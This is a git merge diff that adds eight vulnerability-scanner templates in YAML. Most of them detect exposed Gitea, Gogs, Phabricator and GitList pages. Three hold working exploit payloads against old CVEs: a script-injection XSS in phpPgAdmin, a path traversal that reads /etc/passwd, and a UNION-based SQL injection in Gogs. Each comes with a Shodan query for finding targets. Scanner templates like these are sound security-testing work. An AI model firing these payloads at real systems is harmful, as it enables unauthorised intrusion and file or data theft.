Merge pull request #3174 from DhiyaneshGeek/master

Version Control Templates
2021-11-21 14:55:24 +05:30 · 2021-11-21 14:55:24 +05:30 · 3fb2bf4644
parent 6eea2f5ec3 d16fb02b21
commit 3fb2bf4644
8 changed files with 217 additions and 0 deletions
--- a/cves/2007/CVE-2007-5728.yaml
+++ b/cves/2007/CVE-2007-5728.yaml
@ -0,0 +1,32 @@
+id: CVE-2007-5728
+
+info:
+  name: phpPgAdmin 4.1.1 - 'Redirect.php' Cross-Site Scripting
+  author: dhiyaneshDK
+  severity: medium
+  description: Cross-site scripting (XSS) vulnerability in phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, different vectors than CVE-2007-2865.
+  tags: cve,cve2007,xss,pgadmin
+  reference: https://www.exploit-db.com/exploits/30090
+  metadata:
+    shodan-query: 'http.title:"phpPgAdmin"'
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(%22document.domain%22)%3C/script%3E?subject=server&server=test'
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - '<script>alert("document.domain")</script>'
+
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
--- a/cves/2008/CVE-2008-5587.yaml
+++ b/cves/2008/CVE-2008-5587.yaml
@ -0,0 +1,27 @@
+id: CVE-2008-5587
+
+info:
+  name: phpPgAdmin 4.2.1 - '_language' Local File Inclusion
+  author: dhiyaneshDK
+  severity: medium
+  reference: https://www.exploit-db.com/exploits/7363
+  tags: cve2008,lfi,phppgadmin
+  metadata:
+    shodan-query: 'http.title:"phpPgAdmin"'
+  description: "Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php."
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00'
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200
--- a/cves/2014/CVE-2014-8682.yaml
+++ b/cves/2014/CVE-2014-8682.yaml
@ -0,0 +1,35 @@
+id: CVE-2014-8682
+
+info:
+  name: Gogs - 'users'/'repos' '?q' SQL Injection
+  author: dhiyaneshDK
+  severity: high
+  description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go.
+  reference:
+    - http://www.securityfocus.com/bid/71187
+    - http://seclists.org/fulldisclosure/2014/Nov/33
+    - http://packetstormsecurity.com/files/129117/Gogs-Repository-Search-SQL-Injection.html
+    - http://gogs.io/docs/intro/change_log.html
+    - https://github.com/gogits/gogs/commit/0c5ba4573aecc9eaed669e9431a70a5d9f184b8d
+    - http://www.exploit-db.com/exploits/35238
+    - https://exchange.xforce.ibmcloud.com/vulnerabilities/98694
+    - http://www.securityfocus.com/archive/1/533995/100/0/threaded
+  tags: cve,cve2014,sqli,gogs
+  metadata:
+    shodan-query: 'title:"Sign In - Gogs"'
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '"ok":true'
+          - '"data"'
+
+      - type: status
+        status:
+          - 200
--- a/exposed-panels/gitea-login.yaml
+++ b/exposed-panels/gitea-login.yaml
@ -0,0 +1,25 @@
+id: gitea-login
+
+info:
+  name: Gitea Login
+  author: dhiyaneshDK
+  severity: info
+  tags: gitea,panel
+  metadata:
+    shodan-query: 'html:"Powered by Gitea Version"'
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/user/login'
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - 'Powered by Gitea Version'
+
+      - type: status
+        status:
+          - 200
--- a/exposed-panels/gogs-login.yaml
+++ b/exposed-panels/gogs-login.yaml
@ -0,0 +1,25 @@
+id: gogs-login
+
+info:
+  name: Sign In - Gogs
+  author: dhiyaneshDK
+  severity: info
+  tags: panel,gogs
+  metadata:
+    shodan-query: 'title:"Sign In - Gogs"'
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/user/login'
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - '<title>Sign In - Gogs</title>'
+
+      - type: status
+        status:
+          - 200
--- a/exposed-panels/phabricator-login.yaml
+++ b/exposed-panels/phabricator-login.yaml
@ -0,0 +1,25 @@
+id: phabricator-login
+
+info:
+  name: Phabricator Login
+  author: dhiyaneshDK
+  severity: info
+  tags: panel,phabricator
+  metadata:
+    shodan-query: 'html:"phabricator-standard-page"'
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/auth/login/'
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - 'phabricator-standard-page'
+
+      - type: status
+        status:
+          - 200
--- a/misconfiguration/git-web-interface.yaml
+++ b/misconfiguration/git-web-interface.yaml
@ -0,0 +1,24 @@
+id: git-web-interface
+
+info:
+  name: Git web interface
+  author: dhiyaneshDK
+  severity: low
+  tags: git
+  metadata:
+    shodan-query: 'html:"git web interface version"'
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'git web interface version'
+
+      - type: status
+        status:
+          - 200
--- a/misconfiguration/gitlist-disclosure.yaml
+++ b/misconfiguration/gitlist-disclosure.yaml
@ -0,0 +1,24 @@
+id: gitlist-disclosure
+
+info:
+  name: GitList Disclosure
+  author: dhiyaneshDK
+  severity: low
+  tags: gitlist,misconfig
+  metadata:
+    shodan-query: 'title:"GitList"'
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'GitList</title>'
+
+      - type: status
+        status:
+          - 200